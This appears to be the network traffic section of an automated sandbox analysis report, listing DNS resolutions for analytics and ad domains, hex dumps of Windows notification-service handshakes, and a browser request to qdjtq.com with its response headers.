            Sep 27, 2024 02:30:48.584899902 CEST1.1.1.1192.168.2.60xc17aNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:48.584899902 CEST1.1.1.1192.168.2.60xc17aNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:48.584899902 CEST1.1.1.1192.168.2.60xc17aNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:49.653466940 CEST1.1.1.1192.168.2.60x704fNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:49.653466940 CEST1.1.1.1192.168.2.60x704fNo error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:49.653923988 CEST1.1.1.1192.168.2.60xabddNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:49.653923988 CEST1.1.1.1192.168.2.60xabddNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
            Sep 27, 2024 02:30:49.653923988 CEST1.1.1.1192.168.2.60xabddNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
            Sep 27, 2024 02:30:50.920646906 CEST1.1.1.1192.168.2.60x8c59No error (0)js.hs-scripts.com104.16.140.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:50.920646906 CEST1.1.1.1192.168.2.60x8c59No error (0)js.hs-scripts.com104.16.137.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:50.920646906 CEST1.1.1.1192.168.2.60x8c59No error (0)js.hs-scripts.com104.16.139.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:50.920646906 CEST1.1.1.1192.168.2.60x8c59No error (0)js.hs-scripts.com104.16.141.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:50.920646906 CEST1.1.1.1192.168.2.60x8c59No error (0)js.hs-scripts.com104.16.138.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:50.921089888 CEST1.1.1.1192.168.2.60xea37No error (0)js.hs-scripts.com65IN (0x0001)false
            Sep 27, 2024 02:30:51.574573994 CEST1.1.1.1192.168.2.60x5ff6No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:51.574573994 CEST1.1.1.1192.168.2.60x5ff6No error (0)static-cdn.hotjar.com18.66.102.106A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.574573994 CEST1.1.1.1192.168.2.60x5ff6No error (0)static-cdn.hotjar.com18.66.102.11A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.574573994 CEST1.1.1.1192.168.2.60x5ff6No error (0)static-cdn.hotjar.com18.66.102.51A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.574573994 CEST1.1.1.1192.168.2.60x5ff6No error (0)static-cdn.hotjar.com18.66.102.53A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.574733973 CEST1.1.1.1192.168.2.60x52ecNo error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:51.662415028 CEST1.1.1.1192.168.2.60xeb6No error (0)analytics.google.com142.250.186.78A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.680893898 CEST1.1.1.1192.168.2.60xc5ffNo error (0)td.doubleclick.net142.250.74.194A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.955957890 CEST1.1.1.1192.168.2.60x50abNo error (0)js.hs-scripts.com104.16.137.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.955957890 CEST1.1.1.1192.168.2.60x50abNo error (0)js.hs-scripts.com104.16.141.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.955957890 CEST1.1.1.1192.168.2.60x50abNo error (0)js.hs-scripts.com104.16.139.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.955957890 CEST1.1.1.1192.168.2.60x50abNo error (0)js.hs-scripts.com104.16.140.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.955957890 CEST1.1.1.1192.168.2.60x50abNo error (0)js.hs-scripts.com104.16.138.209A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.956446886 CEST1.1.1.1192.168.2.60xaeb4No error (0)js.hs-scripts.com65IN (0x0001)false
            Sep 27, 2024 02:30:52.681217909 CEST1.1.1.1192.168.2.60xd10bNo error (0)googleads.g.doubleclick.net142.250.186.34A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.682260036 CEST1.1.1.1192.168.2.60x4a02No error (0)googleads.g.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:52.684426069 CEST1.1.1.1192.168.2.60xcb07No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:52.684426069 CEST1.1.1.1192.168.2.60xcb07No error (0)static-cdn.hotjar.com18.66.102.11A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.684426069 CEST1.1.1.1192.168.2.60xcb07No error (0)static-cdn.hotjar.com18.66.102.53A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.684426069 CEST1.1.1.1192.168.2.60xcb07No error (0)static-cdn.hotjar.com18.66.102.51A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.684426069 CEST1.1.1.1192.168.2.60xcb07No error (0)static-cdn.hotjar.com18.66.102.106A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.685206890 CEST1.1.1.1192.168.2.60x51d9No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:53.961424112 CEST1.1.1.1192.168.2.60xfa16No error (0)js.hs-banner.com104.18.40.240A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:53.961424112 CEST1.1.1.1192.168.2.60xfa16No error (0)js.hs-banner.com172.64.147.16A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:53.963335037 CEST1.1.1.1192.168.2.60x65b9No error (0)js.hs-banner.com65IN (0x0001)false
            Sep 27, 2024 02:30:53.989485979 CEST1.1.1.1192.168.2.60xe208No error (0)js.hs-analytics.net104.17.175.201A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:53.989485979 CEST1.1.1.1192.168.2.60xe208No error (0)js.hs-analytics.net104.16.160.168A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:53.989850998 CEST1.1.1.1192.168.2.60x57a5No error (0)js.hs-analytics.net65IN (0x0001)false
            Sep 27, 2024 02:30:54.010297060 CEST1.1.1.1192.168.2.60xccb7No error (0)googleads.g.doubleclick.net142.250.186.162A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.010921955 CEST1.1.1.1192.168.2.60x919cNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:54.095899105 CEST1.1.1.1192.168.2.60x57e2No error (0)js.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.095899105 CEST1.1.1.1192.168.2.60x57e2No error (0)js.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.095899105 CEST1.1.1.1192.168.2.60x57e2No error (0)js.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.095899105 CEST1.1.1.1192.168.2.60x57e2No error (0)js.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.095899105 CEST1.1.1.1192.168.2.60x57e2No error (0)js.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.096328020 CEST1.1.1.1192.168.2.60x17a8No error (0)js.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:54.114815950 CEST1.1.1.1192.168.2.60xc07bNo error (0)script.hotjar.com13.33.187.74A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.114815950 CEST1.1.1.1192.168.2.60xc07bNo error (0)script.hotjar.com13.33.187.19A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.114815950 CEST1.1.1.1192.168.2.60xc07bNo error (0)script.hotjar.com13.33.187.92A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.114815950 CEST1.1.1.1192.168.2.60xc07bNo error (0)script.hotjar.com13.33.187.109A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.118350029 CEST1.1.1.1192.168.2.60xc06No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.118561983 CEST1.1.1.1192.168.2.60xb8f5No error (0)www.google.com65IN (0x0001)false
            Sep 27, 2024 02:30:54.120913982 CEST1.1.1.1192.168.2.60xcf4dNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:54.120913982 CEST1.1.1.1192.168.2.60xcf4dNo error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.121277094 CEST1.1.1.1192.168.2.60x7a1cNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:54.985634089 CEST1.1.1.1192.168.2.60x5bfcNo error (0)stats.g.doubleclick.net74.125.206.154A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.985634089 CEST1.1.1.1192.168.2.60x5bfcNo error (0)stats.g.doubleclick.net74.125.206.156A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.985634089 CEST1.1.1.1192.168.2.60x5bfcNo error (0)stats.g.doubleclick.net74.125.206.157A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.985634089 CEST1.1.1.1192.168.2.60x5bfcNo error (0)stats.g.doubleclick.net74.125.206.155A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.062659979 CEST1.1.1.1192.168.2.60xae5No error (0)forms.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.062659979 CEST1.1.1.1192.168.2.60xae5No error (0)forms.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.062659979 CEST1.1.1.1192.168.2.60xae5No error (0)forms.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.062659979 CEST1.1.1.1192.168.2.60xae5No error (0)forms.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.062659979 CEST1.1.1.1192.168.2.60xae5No error (0)forms.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.063888073 CEST1.1.1.1192.168.2.60x7e0aNo error (0)forms.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.083473921 CEST1.1.1.1192.168.2.60x5e33No error (0)js.hs-analytics.net104.17.175.201A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.083473921 CEST1.1.1.1192.168.2.60x5e33No error (0)js.hs-analytics.net104.16.160.168A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.084326982 CEST1.1.1.1192.168.2.60x1c38No error (0)js.hs-analytics.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.084856987 CEST1.1.1.1192.168.2.60x9e49No error (0)js.hs-banner.com104.18.40.240A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.084856987 CEST1.1.1.1192.168.2.60x9e49No error (0)js.hs-banner.com172.64.147.16A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.085710049 CEST1.1.1.1192.168.2.60x95f5No error (0)js.hs-banner.com65IN (0x0001)false
            Sep 27, 2024 02:30:55.086436987 CEST1.1.1.1192.168.2.60x7c2cNo error (0)js.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.086436987 CEST1.1.1.1192.168.2.60x7c2cNo error (0)js.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.086436987 CEST1.1.1.1192.168.2.60x7c2cNo error (0)js.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.086436987 CEST1.1.1.1192.168.2.60x7c2cNo error (0)js.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.086436987 CEST1.1.1.1192.168.2.60x7c2cNo error (0)js.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.087291002 CEST1.1.1.1192.168.2.60x9234No error (0)js.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.236320019 CEST1.1.1.1192.168.2.60xd552No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.236336946 CEST1.1.1.1192.168.2.60xc5dNo error (0)www.google.com65IN (0x0001)false
            Sep 27, 2024 02:30:55.781676054 CEST1.1.1.1192.168.2.60xb8fbNo error (0)forms.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.781676054 CEST1.1.1.1192.168.2.60xb8fbNo error (0)forms.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.781692982 CEST1.1.1.1192.168.2.60x9a92No error (0)forms.hsforms.com65IN (0x0001)false
            Sep 27, 2024 02:30:56.366812944 CEST1.1.1.1192.168.2.60xe17aNo error (0)forms.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.366812944 CEST1.1.1.1192.168.2.60xe17aNo error (0)forms.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.366812944 CEST1.1.1.1192.168.2.60xe17aNo error (0)forms.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.366812944 CEST1.1.1.1192.168.2.60xe17aNo error (0)forms.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.366812944 CEST1.1.1.1192.168.2.60xe17aNo error (0)forms.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.367418051 CEST1.1.1.1192.168.2.60x984No error (0)forms.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:56.714375973 CEST1.1.1.1192.168.2.60x512bNo error (0)forms.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.714375973 CEST1.1.1.1192.168.2.60x512bNo error (0)forms.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.714396000 CEST1.1.1.1192.168.2.60x9488No error (0)forms.hsforms.com65IN (0x0001)false
            Sep 27, 2024 02:30:57.087966919 CEST1.1.1.1192.168.2.60x5c51No error (0)track.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:57.087966919 CEST1.1.1.1192.168.2.60x5c51No error (0)track.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:57.089960098 CEST1.1.1.1192.168.2.60x7bb2No error (0)track.hubspot.com65IN (0x0001)false
            Sep 27, 2024 02:30:57.854444027 CEST1.1.1.1192.168.2.60xc5a7No error (0)track.hubspot.com65IN (0x0001)false
            Sep 27, 2024 02:30:57.855117083 CEST1.1.1.1192.168.2.60x80dbNo error (0)track.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:57.855117083 CEST1.1.1.1192.168.2.60x80dbNo error (0)track.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
            Session IDSource IPSource PortDestination IPDestination Port
            0192.168.2.64970940.115.3.253443
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:25 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 68 4c 4c 4f 36 48 41 4f 48 6b 6d 78 6d 32 6f 45 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 37 37 34 31 62 38 61 34 30 62 61 34 65 39 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: hLLO6HAOHkmxm2oE.1Context: de7741b8a40ba4e9
            2024-09-27 00:29:25 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-27 00:29:25 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 68 4c 4c 4f 36 48 41 4f 48 6b 6d 78 6d 32 6f 45 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 37 37 34 31 62 38 61 34 30 62 61 34 65 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
            Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: hLLO6HAOHkmxm2oE.2Context: de7741b8a40ba4e9<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
            2024-09-27 00:29:25 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 68 4c 4c 4f 36 48 41 4f 48 6b 6d 78 6d 32 6f 45 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 37 37 34 31 62 38 61 34 30 62 61 34 65 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: hLLO6HAOHkmxm2oE.3Context: de7741b8a40ba4e9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-27 00:29:25 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-27 00:29:25 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6f 62 73 70 69 44 48 54 65 6b 57 45 4e 47 5a 57 4f 39 6e 67 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: obspiDHTekWENGZWO9ngQA.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination Port
            1192.168.2.64971540.115.3.253443
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6b 52 2f 39 53 37 67 38 50 45 4b 38 63 6d 4f 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 32 63 34 65 37 63 63 63 38 34 33 62 32 30 30 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: kR/9S7g8PEK8cmOp.1Context: d2c4e7ccc843b200
            2024-09-27 00:29:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-27 00:29:29 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6b 52 2f 39 53 37 67 38 50 45 4b 38 63 6d 4f 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 32 63 34 65 37 63 63 63 38 34 33 62 32 30 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 2f 46 6d 55 48 49 65 72 35 62 48 42 54 6b 4f 58 4f 45 4f 38 6a 6b 45 63 78 71 77 4f 52 74 6c 2f 6d 6b 59 47 62 66 76 67 6a 42 51 4c 43 52 56 4b 72 41 54 54 4b 2b 76 36 78 71 50 45 32 38 67 47 75 63 36 62 63 58 79 6f 66 77 37 2b 6a 54 64 6f 7a 57 6c 4b 32 5a 54 75 74 64 70 5a 42 38 4b 56 6f 79 64 30 61 75 6a 56 78 50 4e 66
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: kR/9S7g8PEK8cmOp.2Context: d2c4e7ccc843b200<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe/FmUHIer5bHBTkOXOEO8jkEcxqwORtl/mkYGbfvgjBQLCRVKrATTK+v6xqPE28gGuc6bcXyofw7+jTdozWlK2ZTutdpZB8KVoyd0aujVxPNf
            2024-09-27 00:29:29 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6b 52 2f 39 53 37 67 38 50 45 4b 38 63 6d 4f 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 32 63 34 65 37 63 63 63 38 34 33 62 32 30 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: kR/9S7g8PEK8cmOp.3Context: d2c4e7ccc843b200<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-27 00:29:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-27 00:29:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 66 35 70 4d 6f 76 35 53 76 30 65 61 6c 77 67 73 31 38 4d 52 78 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: f5pMov5Sv0ealwgs18MRxQ.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.649717129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:29 UTC659OUTGET /modify/ HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:29 UTC347INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:29 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 1638
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"666-19024951360"
